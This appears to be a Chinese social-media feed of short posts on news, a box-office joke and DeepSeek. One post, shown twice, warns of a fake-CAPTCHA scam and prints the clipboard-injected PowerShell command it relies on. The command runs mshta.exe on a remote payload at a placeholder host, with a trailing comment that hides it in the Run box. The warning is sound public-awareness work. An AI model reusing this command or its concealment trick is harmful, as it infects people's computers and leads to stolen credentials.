2025-02-13 20:15
#缅甸将向泰移交7000名电诈园区人员# Done.
2025-02-13 20:05
《哪吒2》票房过百亿肯定是没问题了。
健康成年人每天排出约 200 克大便。50 亿斤就需要 125 亿人天的工作量。幸好咱们国家人多,全国人民齐上阵,十天也就凑出来了。假设这个人还有 60 年寿命,只要每天吃 228 斤就能在死前兑现承诺。
2025-02-13 17:44
受害者现身说法……//@MZK豆豆:前几个月找油管下载脑袋发抽中招过,powershell远程下载了一个txt,里边有执行文件,一通找到运行程序位置和启动项,可惜还是密码泄露,PayPal盗刷了,申诉找回了。这种火绒扫不出来,真是坑
2025-02-13 16:52
现在黑产有一种新的社交工程学挂马方案。
你访问一些网站的时候,网页忽然弹出提示,让你证明自己是真人。这倒也很常见,于是你点了一下那个验证窗口,又弹出提示,让你按 Win+R,然后 Ctrl+V,再回车(图一)。
你按下 Win+R,发现弹出一个窗口。再按 Ctrl+V,窗口里出现了:✅ 'I am not a robot: CAPTCHA Verification UID: 7811'(图二)。这好像真的是在做验证。但这时只要你再按一下回车,你的电脑就会下载并执行攻击者的木马。
因为在你最开始点击那个验证窗口的时候,网站向你的剪贴板中写入的内容实际是:
powershell -w 1 -C "$l='hττps://AAAAAAAA.AAA/AAAAAA.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 7811'
这是一条下载并执行木马的命令。因为 Win+R 弹出的那个命令执行输入框地宽度有限,对过长的输入行只显示末尾部分。攻击者精确地控制内容长度,巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候,已经晚了。
图三显然是一个受害者。
2025-02-13 16:52
现在黑产有一种新的社交工程学挂马方案。
你访问一些网站的时候,网页忽然弹出提示,让你证明自己是真人。这倒也很常见,于是你点了一下那个验证窗口,又弹出提示,让你按 Win+R,然后 Ctrl+V,再回车(图一)。
你按下 Win+R,发现弹出一个窗口。再按 Ctrl+V,窗口里出现了:✅ 'I am not a robot: CAPTCHA Verification UID: 7811'(图二)。这好像真的是在做验证。但这时只要你再按一下回车,你的电脑就会下载并执行攻击者的木马。
因为在你最开始点击那个验证窗口的时候,网站向你的剪贴板中写入的内容实际是:
powershell -w 1 -C "$l='hττps://AAAAAAAA.AAA/AAAAAA.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 7811'
这是一条下载并执行木马的命令。因为 Win+R 弹出的那个命令执行输入框地宽度有限,对过长的输入行只显示末尾部分。攻击者精确地控制内容长度,巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候,已经晚了。
图三显然是一个受害者。
2025-02-13 15:59
DeepSeek 目前是个实验室型的公司,所以苹果没有选择 DeepSeek 并不奇怪。伺候甲方不是光技术好就行的。
即便苹果要选择和 DeepSeek 合作,恐怕也得再引入一个有成熟 toB 经营班子的第三方,由第三方直接提供服务,而 DeepSeek 在背后做技术支持。但这样就太复杂了。